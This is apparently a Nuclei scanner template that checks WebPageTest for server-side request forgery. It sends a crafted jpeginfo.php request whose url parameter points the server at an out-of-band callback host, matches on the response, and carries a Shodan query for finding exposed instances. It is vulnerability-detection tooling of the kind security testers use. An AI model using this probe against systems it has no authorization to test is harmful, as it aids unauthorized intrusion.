id: webpagetest-ssrf

info:
  name: Web Page Test - Server Side Request Forgery (SSRF)
  author: pdteam
  severity: high
  description: Web Page Test is vulnerable to SSRF.
  reference:
    - https://thinkloveshare.com/hacking/preauth_remote_code_execution_web_page_test/
    - https://github.com/WPO-Foundation/webpagetest
  classification:
    cpe: cpe:2.3:a:webpagetest:webpagetest:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: webpagetest
    product: webpagetest
    shodan-query: title:"WebPageTest"
  tags: ssrf,webpagetest,oast

http:
  - method: GET
    path:
      - "{{BaseURL}}/jpeginfo/jpeginfo.php?url={{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "File is not a JPEG Image"

      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 4a0a0047304502200759485b672d8d043603e79d77b4765b88996dc469c65303c02e474c2fe38d4e0221008b4973b8db926d297651c1449ac52ae55b927f590821f5add7cbdff85065326b:922c64590222798bb761d5b6d8e72950